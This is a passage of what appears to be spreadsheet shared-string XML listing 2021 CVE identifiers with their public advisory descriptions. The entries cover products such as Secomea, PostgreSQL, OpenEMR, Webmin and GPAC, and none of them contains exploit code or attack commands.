    <t>A user with permission to log on to the machine hosting the AXIS Device Manager client could under certain conditions extract a memory dump from the built-in Windows Task Manager application. The memory dump may potentially contain credentials of connected Axis devices.</t>
  </si>
  <si>
    <t>CVE-2021-3199</t>
  </si>
  <si>
    <t>Directory traversal with remote code execution can occur in /upload in ONLYOFFICE Document Server before 5.6.3, when JWT is used, via a /.. sequence in an image upload parameter.</t>
  </si>
  <si>
    <t>CVE-2021-31996</t>
  </si>
  <si>
    <t>An issue was discovered in the algorithmica crate through 2021-03-07 for Rust. There is a double free in merge_sort::merge().</t>
  </si>
  <si>
    <t>CVE-2021-31997</t>
  </si>
  <si>
    <t>A UNIX Symbolic Link (Symlink) Following vulnerability in python-postorius of openSUSE Leap 15.2, Factory allows local attackers to escalate from users postorius or postorius-admin to root. This issue affects: openSUSE Leap 15.2 python-postorius version 1.3.2-lp152.1.2 and prior versions. openSUSE Factory python-postorius version 1.3.4-2.1 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-31998</t>
  </si>
  <si>
    <t>A Incorrect Default Permissions vulnerability in the packaging of inn of SUSE Linux Enterprise Server 11-SP3; openSUSE Backports SLE-15-SP2, openSUSE Leap 15.2 allows local attackers to escalate their privileges from the news user to root. This issue affects: SUSE Linux Enterprise Server 11-SP3 inn version inn-2.4.2-170.21.3.1 and prior versions. openSUSE Backports SLE-15-SP2 inn versions prior to 2.6.2. openSUSE Leap 15.2 inn versions prior to 2.6.2.</t>
  </si>
  <si>
    <t>CVE-2021-31999</t>
  </si>
  <si>
    <t>A Reliance on Untrusted Inputs in a Security Decision vulnerability in Rancher allows users in the cluster to act as others users in the cluster by forging the "Impersonate-User" or "Impersonate-Group" headers. This issue affects: Rancher versions prior to 2.5.9. Rancher versions prior to 2.4.16.</t>
  </si>
  <si>
    <t>807</t>
  </si>
  <si>
    <t>CVE-2021-3200</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in libsolv 2020-12-13 via the Solver * testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **resultp, int *resultflagsp function at src/testcase.c: line 2334, which could cause a denial of service</t>
  </si>
  <si>
    <t>CVE-2021-32000</t>
  </si>
  <si>
    <t>A UNIX Symbolic Link (Symlink) Following vulnerability in the clone-master-clean-up.sh script of clone-master-clean-up in SUSE Linux Enterprise Server 12 SP3, SUSE Linux Enterprise Server 15 SP1; openSUSE Factory allows local attackers to delete arbitrary files. This issue affects: SUSE Linux Enterprise Server 12 SP3 clone-master-clean-up version 1.6-4.6.1 and prior versions. SUSE Linux Enterprise Server 15 SP1 clone-master-clean-up version 1.6-3.9.1 and prior versions. openSUSE Factory clone-master-clean-up version 1.6-1.4 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-32001</t>
  </si>
  <si>
    <t>K3s in SUSE Rancher allows any user with direct access to the datastore, or a copy of a datastore backup, to extract the cluster's confidential keying material (cluster certificate authority private keys, secrets encryption configuration passphrase, etc.) and decrypt it, without having to know the token value. This issue affects: SUSE Rancher K3s version v1.19.12+k3s1, v1.20.8+k3s1, v1.21.2+k3s1 and prior versions; RKE2 version v1.19.12+rke2r1, v1.20.8+rke2r1, v1.21.2+rke2r1 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-32002</t>
  </si>
  <si>
    <t>Improper Access Control vulnerability in web service of Secomea SiteManager allows local attacker without credentials to gather network information and configuration of the SiteManager. This issue affects: Secomea SiteManager All versions prior to 9.5 on Hardware.</t>
  </si>
  <si>
    <t>CVE-2021-32003</t>
  </si>
  <si>
    <t>Unprotected Transport of Credentials vulnerability in SiteManager provisioning service allows local attacker to capture credentials if the service is used after provisioning. This issue affects: Secomea SiteManager All versions prior to 9.5 on Hardware.</t>
  </si>
  <si>
    <t>CVE-2021-32004</t>
  </si>
  <si>
    <t>This issue affects: Secomea GateManager All versions prior to 9.6. Improper Check of host header in web server of Secomea GateManager allows attacker to cause browser cache poisoning.</t>
  </si>
  <si>
    <t>CVE-2021-32005</t>
  </si>
  <si>
    <t>Cross-site Scripting (XSS) vulnerability in log view of Secomea SiteManager allows a logged in user to store javascript for later execution. This issue affects: Secomea SiteManager Version 9.6.621421014 and all prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-32006</t>
  </si>
  <si>
    <t>This issue affects: Secomea GateManager Version 9.6.621421014 and all prior versions. Permission Issues vulnerability in LinkManager web portal of Secomea GateManager allows logged in LinkManager user to access stored SiteManager backup files.</t>
  </si>
  <si>
    <t>CVE-2021-32008</t>
  </si>
  <si>
    <t>This issue affects: Secomea GateManager Version 9.6.621421014 and all prior versions. Improper Limitation of a Pathname to restricted directory, allows logged in GateManager admin to delete system Files or Directories.</t>
  </si>
  <si>
    <t>CVE-2021-32009</t>
  </si>
  <si>
    <t>Cross-site Scripting (XSS) vulnerability in firmware section of Secomea GateManager allows logged in user to inject javascript in browser session. This issue affects: Secomea GateManager Version 9.6.621421014 and all prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-32010</t>
  </si>
  <si>
    <t>Inadequate Encryption Strength vulnerability in TLS stack of Secomea SiteManager, LinkManager, GateManager may facilitate man in the middle attacks. This issue affects: Secomea SiteManager All versions prior to 9.7. Secomea LinkManager versions prior to 9.7. Secomea GateManager versions prior to 9.7.</t>
  </si>
  <si>
    <t>CVE-2021-32012</t>
  </si>
  <si>
    <t>SheetJS and SheetJS Pro through 0.16.9 allows attackers to cause a denial of service (memory consumption) via a crafted .xlsx document that is mishandled when read by xlsx.js (issue 1 of 2).</t>
  </si>
  <si>
    <t>CVE-2021-32013</t>
  </si>
  <si>
    <t>SheetJS and SheetJS Pro through 0.16.9 allows attackers to cause a denial of service (memory consumption) via a crafted .xlsx document that is mishandled when read by xlsx.js (issue 2 of 2).</t>
  </si>
  <si>
    <t>CVE-2021-32014</t>
  </si>
  <si>
    <t>SheetJS and SheetJS Pro through 0.16.9 allows attackers to cause a denial of service (CPU consumption) via a crafted .xlsx document that is mishandled when read by xlsx.js.</t>
  </si>
  <si>
    <t>CVE-2021-32015</t>
  </si>
  <si>
    <t>In Nuvoton NPCT75x TPM 1.2 firmware 7.4.0.0, a local authenticated malicious user with high privileges could potentially gain unauthorized access to TPM non-volatile memory. NOTE: Upgrading to firmware version 7.4.0.1 will mitigate against the vulnerability, but version 7.4.0.1 is not TCG or Common Criteria (CC) certified. Nuvoton recommends that users apply the NPCT75x TPM 1.2 firmware update.</t>
  </si>
  <si>
    <t>CVE-2021-32016</t>
  </si>
  <si>
    <t>An issue was discovered in JUMP AMS 3.6.0.04.009-2487. A JUMP SOAP endpoint permitted the writing of arbitrary files to a user-controlled location on the remote filesystem (with user-controlled content) via directory traversal, potentially leading to remote code and command execution.</t>
  </si>
  <si>
    <t>CVE-2021-32017</t>
  </si>
  <si>
    <t>An issue was discovered in JUMP AMS 3.6.0.04.009-2487. A JUMP SOAP endpoint permitted the listing of the content of the remote file system. This can be used to identify the complete server filesystem structure, i.e., identifying all the directories and files.</t>
  </si>
  <si>
    <t>CVE-2021-32018</t>
  </si>
  <si>
    <t>An issue was discovered in JUMP AMS 3.6.0.04.009-2487. The JUMP SOAP API was vulnerable to arbitrary file reading due to an improper limitation of file loading on the server filesystem, aka directory traversal.</t>
  </si>
  <si>
    <t>CVE-2021-32019</t>
  </si>
  <si>
    <t>There is missing input validation of host names displayed in OpenWrt before 19.07.8. The Connection Status page of the luci web-interface allows XSS, which can be used to gain full control over the affected system via ICMP.</t>
  </si>
  <si>
    <t>CVE-2021-32020</t>
  </si>
  <si>
    <t>The kernel in Amazon Web Services FreeRTOS before 10.4.3 has insufficient bounds checking during management of heap memory.</t>
  </si>
  <si>
    <t>CVE-2021-32021</t>
  </si>
  <si>
    <t>A denial of service vulnerability in the message broker of BlackBerry Protect for Windows version(s) versions 1574 and earlier could allow an attacker to potentially execute code in the context of a BlackBerry Cylance service that has admin rights on the system.</t>
  </si>
  <si>
    <t>CVE-2021-32022</t>
  </si>
  <si>
    <t>A low privileged delete vulnerability using CEF RPC server of BlackBerry Protect for Windows version(s) versions 1574 and earlier could allow an attacker to potentially execute code in the context of a BlackBerry Cylance service that has admin rights on the system and gaining the ability to delete data from the local system.</t>
  </si>
  <si>
    <t>CVE-2021-32023</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability in the message broker of BlackBerry Protect for Windows version(s) versions 1574 and earlier could allow an attacker to potentially execute code in the context of a BlackBerry Cylance service that has admin rights on the system.</t>
  </si>
  <si>
    <t>CVE-2021-32024</t>
  </si>
  <si>
    <t>A remote code execution vulnerability in the BMP image codec of BlackBerry QNX SDP version(s) 6.4 to 7.1 could allow an attacker to potentially execute code in the context of the affected process.</t>
  </si>
  <si>
    <t>CVE-2021-32025</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability in the QNX Neutrino Kernel of affected versions of QNX Software Development Platform version(s) 6.4.0 to 7.0, QNX Momentics all 6.3.x versions, QNX OS for Safety versions 1.0.0 to 1.0.2, QNX OS for Safety versions 2.0.0 to 2.0.1, QNX for Medical versions 1.0.0 to 1.1.1, and QNX OS for Medical version 2.0.0 could allow an attacker to potentially access data, modify behavior, or permanently crash the system.</t>
  </si>
  <si>
    <t>CVE-2021-32027</t>
  </si>
  <si>
    <t>A flaw was found in postgresql in versions before 13.3, before 12.7, before 11.12, before 10.17 and before 9.6.22. While modifying certain SQL array values, missing bounds checks let authenticated database users write arbitrary bytes to a wide area of server memory. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-32028</t>
  </si>
  <si>
    <t>A flaw was found in postgresql. Using an INSERT ... ON CONFLICT ... DO UPDATE command on a purpose-crafted table, an authenticated database user could read arbitrary bytes of server memory. The highest threat from this vulnerability is to data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-32029</t>
  </si>
  <si>
    <t>A flaw was found in postgresql. Using an UPDATE ... RETURNING command on a purpose-crafted table, an authenticated database user could read arbitrary bytes of server memory. The highest threat from this vulnerability is to data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-32030</t>
  </si>
  <si>
    <t>The administrator application on ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator interface. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations.</t>
  </si>
  <si>
    <t>CVE-2021-32032</t>
  </si>
  <si>
    <t>In Trusted Firmware-M through 1.3.0, cleaning up the memory allocated for a multi-part cryptographic operation (in the event of a failure) can prevent the abort() operation in the associated cryptographic library from freeing internal resources, causing a memory leak.</t>
  </si>
  <si>
    <t>CVE-2021-32033</t>
  </si>
  <si>
    <t>Protectimus SLIM NFC 70 10.01 devices allow a Time Traveler attack in which attackers can predict TOTP passwords in certain situations. The time value used by the device can be set independently from the used seed value for generating time-based one-time passwords, without authentication. Thus, an attacker with short-time physical access to a device can set the internal real-time clock (RTC) to the future, generate one-time passwords, and reset the clock to the current time. This allows the generation of valid future time-based one-time passwords without having further access to the hardware token.</t>
  </si>
  <si>
    <t>CVE-2021-32036</t>
  </si>
  <si>
    <t>An authenticated user without any specific authorizations may be able to repeatedly invoke the features command where at a high volume may lead to resource depletion or generate high lock contention. This may result in denial of service and in rare cases could result in id field collisions.</t>
  </si>
  <si>
    <t>CVE-2021-32037</t>
  </si>
  <si>
    <t>An authorized user may trigger an invariant which may result in denial of service or server exit if a relevant aggregation request is sent to a shard. Usually, the requests are sent via mongos and special privileges are required in order to know the address of the shards and to log in to the shards of an auth enabled environment.</t>
  </si>
  <si>
    <t>CVE-2021-32039</t>
  </si>
  <si>
    <t>Users with appropriate file access may be able to access unencrypted user credentials saved by MongoDB Extension for VS Code in a binary file. These credentials may be used by malicious attackers to perform unauthorized actions. This vulnerability affects all MongoDB Extension for VS Code including and prior to version 0.7.0</t>
  </si>
  <si>
    <t>CVE-2021-3204</t>
  </si>
  <si>
    <t>SSRF in the document conversion component of Webware Webdesktop 5.1.15 allows an attacker to read all files from the server.</t>
  </si>
  <si>
    <t>CVE-2021-32040</t>
  </si>
  <si>
    <t>It may be possible to have an extremely long aggregation pipeline in conjunction with a specific stage/operator and cause a stack overflow due to the size of the stack frames used by that stage. If an attacker could cause such an aggregation to occur, they could maliciously crash MongoDB in a DoS attack. This vulnerability affects MongoDB versions prior to 5.0.4, 4.4.11, 4.2.16.</t>
  </si>
  <si>
    <t>CVE-2021-32051</t>
  </si>
  <si>
    <t>Hexagon G!nius Auskunftsportal before 5.0.0.0 allows SQL injection via the GiPWorkflow/Service/DownloadPublicFile id parameter.</t>
  </si>
  <si>
    <t>CVE-2021-32052</t>
  </si>
  <si>
    <t>In Django 2.2 before 2.2.22, 3.1 before 3.1.10, and 3.2 before 3.2.2 (with Python 3.9.5+), URLValidator does not prohibit newlines and tabs (unless the URLField form field is used). If an application uses values with newlines in an HTTP response, header injection can occur. Django itself is unaffected because HttpResponse prohibits newlines in HTTP headers.</t>
  </si>
  <si>
    <t>CVE-2021-32053</t>
  </si>
  <si>
    <t>JPA Server in HAPI FHIR before 5.4.0 allows a user to deny service (e.g., disable access to the database after the attack stops) via history requests. This occurs because of a SELECT COUNT statement that requires a full index scan, with an accompanying large amount of server resources if there are many simultaneous history requests.</t>
  </si>
  <si>
    <t>CVE-2021-32054</t>
  </si>
  <si>
    <t>Firely/Incendi Spark before 1.5.5-r4 lacks Content-Disposition headers in certain situations, which may cause crafted files to be delivered to clients such that they are rendered directly in a victim's web browser.</t>
  </si>
  <si>
    <t>CVE-2021-32055</t>
  </si>
  <si>
    <t>Mutt 1.11.0 through 2.0.x before 2.0.7 (and NeoMutt 2019-10-25 through 2021-05-04) has a $imap_qresync issue in which imap/util.c has an out-of-bounds read in situations where an IMAP sequence set ends with a comma. NOTE: the $imap_qresync setting for QRESYNC is not enabled by default.</t>
  </si>
  <si>
    <t>CVE-2021-32056</t>
  </si>
  <si>
    <t>Cyrus IMAP before 3.2.7, and 3.3.x and 3.4.x before 3.4.1, allows remote authenticated users to bypass intended access restrictions on server annotations and consequently cause replication to stall.</t>
  </si>
  <si>
    <t>CVE-2021-32061</t>
  </si>
  <si>
    <t>S3Scanner before 2.0.2 allows Directory Traversal via a crafted bucket, as demonstrated by a &lt;Key&gt;../ substring in a ListBucketResult element.</t>
  </si>
  <si>
    <t>CVE-2021-32062</t>
  </si>
  <si>
    <t>MapServer before 7.0.8, 7.1.x and 7.2.x before 7.2.3, 7.3.x and 7.4.x before 7.4.5, and 7.5.x and 7.6.x before 7.6.3 does not properly enforce the MS_MAP_NO_PATH and MS_MAP_PATTERN restrictions that are intended to control the locations from which a mapfile may be loaded (with MapServer CGI).</t>
  </si>
  <si>
    <t>CVE-2021-32066</t>
  </si>
  <si>
    <t>An issue was discovered in Ruby through 2.6.7, 2.7.x through 2.7.3, and 3.x through 3.0.1. Net::IMAP does not raise an exception when StartTLS fails with an an unknown response, which might allow man-in-the-middle attackers to bypass the TLS protections by leveraging a network position between the client and the registry to block the StartTLS command, aka a "StartTLS stripping attack."</t>
  </si>
  <si>
    <t>CVE-2021-32067</t>
  </si>
  <si>
    <t>The MiCollab Client Service component in Mitel MiCollab before 9.3 could allow an attacker to view sensitive system information through an HTTP response due to insufficient output sanitization.</t>
  </si>
  <si>
    <t>CVE-2021-32068</t>
  </si>
  <si>
    <t>The AWV and MiCollab Client Service components in Mitel MiCollab before 9.3 could allow an attacker to perform a Man-In-the-Middle attack by sending multiple session renegotiation requests, due to insufficient TLS session controls. A successful exploit could allow an attacker to modify application data and state.</t>
  </si>
  <si>
    <t>CVE-2021-32069</t>
  </si>
  <si>
    <t>The AWV component of Mitel MiCollab before 9.3 could allow an attacker to perform a Man-In-the-Middle attack due to improper TLS negotiation. A successful exploit could allow an attacker to view and modify data.</t>
  </si>
  <si>
    <t>CVE-2021-32070</t>
  </si>
  <si>
    <t>The MiCollab Client Service component in Mitel MiCollab before 9.3 could allow an attacker to perform a clickjacking attack due to an insecure header response. A successful exploit could allow an attacker to modify the browser header and redirect users.</t>
  </si>
  <si>
    <t>CVE-2021-32071</t>
  </si>
  <si>
    <t>The MiCollab Client service in Mitel MiCollab before 9.3 could allow an unauthenticated user to gain system access due to improper access control. A successful exploit could allow an attacker to view and modify application data, and cause a denial of service for users.</t>
  </si>
  <si>
    <t>CVE-2021-32072</t>
  </si>
  <si>
    <t>The MiCollab Client Service component in Mitel MiCollab before 9.3 could allow an attacker to get source code information (disclosing sensitive application data) due to insufficient output sanitization. A successful exploit could allow an attacker to view source code methods.</t>
  </si>
  <si>
    <t>CVE-2021-32073</t>
  </si>
  <si>
    <t>DedeCMS V5.7 SP2 contains a CSRF vulnerability that allows a remote attacker to send a malicious request to to the web manager allowing remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-32074</t>
  </si>
  <si>
    <t>HashiCorp vault-action (aka Vault GitHub Action) before 2.2.0 allows attackers to obtain sensitive information from log files because a multi-line secret was not correctly registered with GitHub Actions for log masking.</t>
  </si>
  <si>
    <t>CVE-2021-32075</t>
  </si>
  <si>
    <t>Re-Logic Terraria before 1.4.2.3 performs Insecure Deserialization.</t>
  </si>
  <si>
    <t>CVE-2021-32076</t>
  </si>
  <si>
    <t>Access Restriction Bypass via referrer spoof was discovered in SolarWinds Web Help Desk 12.7.2. An attacker can access the 'Web Help Desk Getting Started Wizard', especially the admin account creation page, from a non-privileged IP address network range or loopback address by intercepting the HTTP request and changing the referrer from the public IP address to the loopback.</t>
  </si>
  <si>
    <t>CVE-2021-32077</t>
  </si>
  <si>
    <t>Primary Source Verification in VerityStream MSOW Solutions before 3.1.1 allows an anonymous internet user to discover Social Security Number (SSN) values via a brute-force attack on a (sometimes hidden) search field, because the last four SSN digits are part of the supported combination of search selectors. This discloses doctors' and nurses' social security numbers and PII.</t>
  </si>
  <si>
    <t>CVE-2021-32078</t>
  </si>
  <si>
    <t>An Out-of-Bounds Read was discovered in arch/arm/mach-footbridge/personal-pci.c in the Linux kernel through 5.12.11 because of the lack of a check for a value that shouldn't be negative, e.g., access to element -2 of an array, aka CID-298a58e165e4.</t>
  </si>
  <si>
    <t>CVE-2021-32089</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** An issue was discovered on Zebra (formerly Motorola Solutions) Fixed RFID Reader FX9500 devices. An unauthenticated attacker can upload arbitrary files to the filesystem that can then be accessed through the web interface. This can lead to information disclosure and code execution. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2021-32090</t>
  </si>
  <si>
    <t>The dashboard component of StackLift LocalStack 0.12.6 allows attackers to inject arbitrary shell commands via the functionName parameter.</t>
  </si>
  <si>
    <t>CVE-2021-32091</t>
  </si>
  <si>
    <t>A Cross-site scripting (XSS) vulnerability exists in StackLift LocalStack 0.12.6.</t>
  </si>
  <si>
    <t>CVE-2021-32092</t>
  </si>
  <si>
    <t>A Cross-site scripting (XSS) vulnerability in the DocumentAction component of U.S. National Security Agency (NSA) Emissary 5.9.0 allows remote attackers to inject arbitrary web script or HTML via the uuid parameter.</t>
  </si>
  <si>
    <t>CVE-2021-32093</t>
  </si>
  <si>
    <t>The ConfigFileAction component of U.S. National Security Agency (NSA) Emissary 5.9.0 allows an authenticated user to read arbitrary files via the ConfigName parameter.</t>
  </si>
  <si>
    <t>CVE-2021-32094</t>
  </si>
  <si>
    <t>U.S. National Security Agency (NSA) Emissary 5.9.0 allows an authenticated user to upload arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2021-32095</t>
  </si>
  <si>
    <t>U.S. National Security Agency (NSA) Emissary 5.9.0 allows an authenticated user to delete arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2021-32096</t>
  </si>
  <si>
    <t>The ConsoleAction component of U.S. National Security Agency (NSA) Emissary 5.9.0 allows a CSRF attack that results in injecting arbitrary Ruby code (for an eval call) via the CONSOLE_COMMAND_STRING parameter.</t>
  </si>
  <si>
    <t>CVE-2021-32098</t>
  </si>
  <si>
    <t>Artica Pandora FMS 742 allows unauthenticated attackers to perform Phar deserialization.</t>
  </si>
  <si>
    <t>CVE-2021-32099</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in the pandora_console component of Artica Pandora FMS 742 allows an unauthenticated attacker to upgrade his unprivileged session via the /include/chart_generator.php session_id parameter, leading to a login bypass.</t>
  </si>
  <si>
    <t>CVE-2021-3210</t>
  </si>
  <si>
    <t>components/Modals/HelpTexts/GenericAll/GenericAll.jsx in Bloodhound &lt;= 4.0.1 allows remote attackers to execute arbitrary system commands when the victim imports a malicious data file containing JavaScript in the objectId parameter.</t>
  </si>
  <si>
    <t>CVE-2021-32100</t>
  </si>
  <si>
    <t>A remote file inclusion vulnerability exists in Artica Pandora FMS 742, exploitable by the lowest privileged user.</t>
  </si>
  <si>
    <t>CVE-2021-32101</t>
  </si>
  <si>
    <t>The Patient Portal of OpenEMR 5.0.2.1 is affected by a incorrect access control system in portal/patient/_machine_config.php. To exploit the vulnerability, an unauthenticated attacker can register an account, bypassing the permission check of this portal's API. Then, the attacker can then manipulate and read data of every registered patient.</t>
  </si>
  <si>
    <t>CVE-2021-32102</t>
  </si>
  <si>
    <t>A SQL injection vulnerability exists (with user privileges) in library/custom_template/ajax_code.php in OpenEMR 5.0.2.1.</t>
  </si>
  <si>
    <t>CVE-2021-32103</t>
  </si>
  <si>
    <t>A Stored XSS vulnerability in interface/usergroup/usergroup_admin.php in OpenEMR before 5.0.2.1 allows a admin authenticated user to inject arbitrary web script or HTML via the lname parameter.</t>
  </si>
  <si>
    <t>CVE-2021-32104</t>
  </si>
  <si>
    <t>A SQL injection vulnerability exists (with user privileges) in interface/forms/eye_mag/save.php in OpenEMR 5.0.2.1.</t>
  </si>
  <si>
    <t>CVE-2021-32106</t>
  </si>
  <si>
    <t>In ICEcoder 8.0 allows, a reflected XSS vulnerability was identified in the multipe-results.php page due to insufficient sanitization of the _GET['replace'] variable. As a result, arbitrary Javascript code can get executed.</t>
  </si>
  <si>
    <t>CVE-2021-32122</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by CSRF. This affects EX3700 before 1.0.0.90, EX3800 before 1.0.0.90, EX6120 before 1.0.0.64, and EX6130 before 1.0.0.44.</t>
  </si>
  <si>
    <t>CVE-2021-32132</t>
  </si>
  <si>
    <t>The abst_box_size function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.</t>
  </si>
  <si>
    <t>CVE-2021-32134</t>
  </si>
  <si>
    <t>The gf_odf_desc_copy function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.</t>
  </si>
  <si>
    <t>CVE-2021-32135</t>
  </si>
  <si>
    <t>The trak_box_size function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.</t>
  </si>
  <si>
    <t>CVE-2021-32136</t>
  </si>
  <si>
    <t>Heap buffer overflow in the print_udta function in MP4Box in GPAC 1.0.1 allows attackers to cause a denial of service or execute arbitrary code via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-32137</t>
  </si>
  <si>
    <t>Heap buffer overflow in the URL_GetProtocolType function in MP4Box in GPAC 1.0.1 allows attackers to cause a denial of service or execute arbitrary code via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-32138</t>
  </si>
  <si>
    <t>The DumpTrackInfo function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.</t>
  </si>
  <si>
    <t>CVE-2021-32139</t>
  </si>
  <si>
    <t>The gf_isom_vp_config_get function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.</t>
  </si>
  <si>
    <t>CVE-2021-32156</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 via the Scheduled Cron Jobs feature.</t>
  </si>
  <si>
    <t>CVE-2021-32157</t>
  </si>
  <si>
    <t>A Cross-Site Scripting (XSS) vulnerability exists in Webmin 1.973 via the Scheduled Cron Jobs feature.</t>
  </si>
  <si>
    <t>CVE-2021-32158</t>
  </si>
  <si>
    <t>A Cross-Site Scripting (XSS) vulnerability exists in Webmin 1.973 via the Upload and Download feature.</t>
  </si>
  <si>
    <t>CVE-2021-32159</t>
  </si>
  <si>
    <t>A Cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 via the Upload and Download feature.</t>
  </si>
  <si>
    <t>CVE-2021-32160</t>
  </si>
  <si>
    <t>A Cross-Site Scripting (XSS) vulnerability exists in Webmin 1.973 through the Add Users feature.</t>
  </si>
  <si>
    <t>CVE-2021-32161</t>
  </si>
  <si>
    <t>A Cross-Site Scripting (XSS) vulnerability exists in Webmin 1.973 through the File Manager feature.</t>
  </si>
  <si>
    <t>CVE-2021-32162</t>
  </si>
  <si>
    <t>A Cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 through the File Manager feature.</t>
  </si>
  <si>
    <t>CVE-2021-32172</t>
  </si>
  <si>
    <t>Maian Cart v3.8 contains a preauthorization remote code execution (RCE) exploit via a broken access control issue in the Elfinder plugin.</t>
  </si>
  <si>
    <t>CVE-2021-32198</t>
  </si>
  <si>
    <t>EmTec ZOC through 8.02.4 allows remote servers to cause a denial of service (Windows GUI hang) by telling the ZOC window to change its title repeatedly at high speed, which results in many SetWindowTextA or SetWindowTextW calls. In other words, it does not implement a usleep or similar delay upon processing a title change.</t>
  </si>
  <si>
    <t>CVE-2021-32202</t>
  </si>
  <si>
    <t>In CS-Cart version 4.11.1, it is possible to induce copy-paste XSS by manipulating the "post description" filed in the blog post creation page.</t>
  </si>
  <si>
    <t>CVE-2021-3223</t>
  </si>
  <si>
    <t>Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files.</t>
  </si>
  <si>
    <t>CVE-2021-32233</t>
  </si>
  <si>
    <t>SmarterTools SmarterMail before Build 7776 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2021-32234</t>
  </si>
  <si>
    <t>SmarterTools SmarterMail 16.x through 100.x before 100.0.7803 allows remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-32238</t>
  </si>
  <si>
    <t>Epic Games / Psyonix Rocket League &lt;=1.95 is affected by Buffer Overflow. Stack-based buffer overflow occurs when Rocket League handles UPK object files that can result in code execution and denial of service scenario.</t>
  </si>
  <si>
    <t>CVE-2021-3224</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability in cszcms 1.2.9 exists in /admin/pages/new via the content parameter.</t>
  </si>
  <si>
    <t>CVE-2021-32243</t>
  </si>
  <si>
    <t>FOGProject v1.5.9 is affected by a File Upload RCE (Authenticated).</t>
  </si>
  <si>
    <t>CVE-2021-32244</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Moodle 3.10.3 allows remote attackers to execute arbitrary web script or HTML via the "Description" field.</t>
  </si>
  <si>
    <t>CVE-2021-32245</t>
  </si>
  <si>
    <t>In PageKit v1.0.18, a user can upload SVG files in the file upload portion of the CMS. These SVG files can contain malicious scripts. This file will be uploaded to the system and it will not be stripped or filtered. The user can create a link on the website pointing to "/storage/exp.svg" that will point to http://localhost/pagekit/storage/exp.svg. When a user comes along to click that link, it will trigger a XSS attack.</t>
  </si>
  <si>
    <t>CVE-2021-32263</t>
  </si>
  <si>
    <t>ok-file-formats through 2021-04-29 has a heap-based buffer overflow in the ok_csv_circular_buffer_read function in ok_csv.c.</t>
  </si>
  <si>
    <t>CVE-2021-32265</t>
  </si>
  <si>
    <t>An issue was discovered in Bento4 through v1.6.0-637. A global-buffer-overflow exists in the function AP4_MemoryByteStream::WritePartial() located in Ap4ByteStream.cpp. It allows an attacker to cause code execution or information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-32268</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in function gf_fprintf in os_file.c in gpac before 1.0.1 allows attackers to execute arbitrary code. The fixed version is 1.0.1.</t>
  </si>
  <si>
    <t>CVE-2021-32269</t>
  </si>
  <si>
    <t>An issue was discovered in gpac through 20200801. A NULL pointer dereference exists in the function ilst_item_box_dump located in box_dump.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-32270</t>
  </si>
  <si>
    <t>An issue was discovered in gpac through 20200801. A NULL pointer dereference exists in the function vwid_box_del located in box_code_base.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-32271</t>
  </si>
  <si>
    <t>An issue was discovered in gpac through 20200801. A stack-buffer-overflow exists in the function DumpRawUIConfig located in odf_dump.c. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-32272</t>
  </si>
  <si>
    <t>An issue was discovered in faad2 before 2.10.0. A heap-buffer-overflow exists in the function stszin located in mp4read.c. It allows an attacker to cause Code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-32273</t>
  </si>
  <si>
    <t>An issue was discovered in faad2 through 2.10.0. A stack-buffer-overflow exists in the function ftypin located in mp4read.c. It allows an attacker to cause Code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-32274</t>
  </si>
  <si>
    <t>An issue was discovered in faad2 through 2.10.0. A heap-buffer-overflow exists in the function sbr_qmf_synthesis_64 located in sbr_qmf.c. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-32275</t>
  </si>
  <si>
    <t>An issue was discovered in faust through v2.30.5. A NULL pointer dereference exists in the function CosPrim::computeSigOutput() located in cosprim.hh. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-32276</t>
  </si>
  <si>
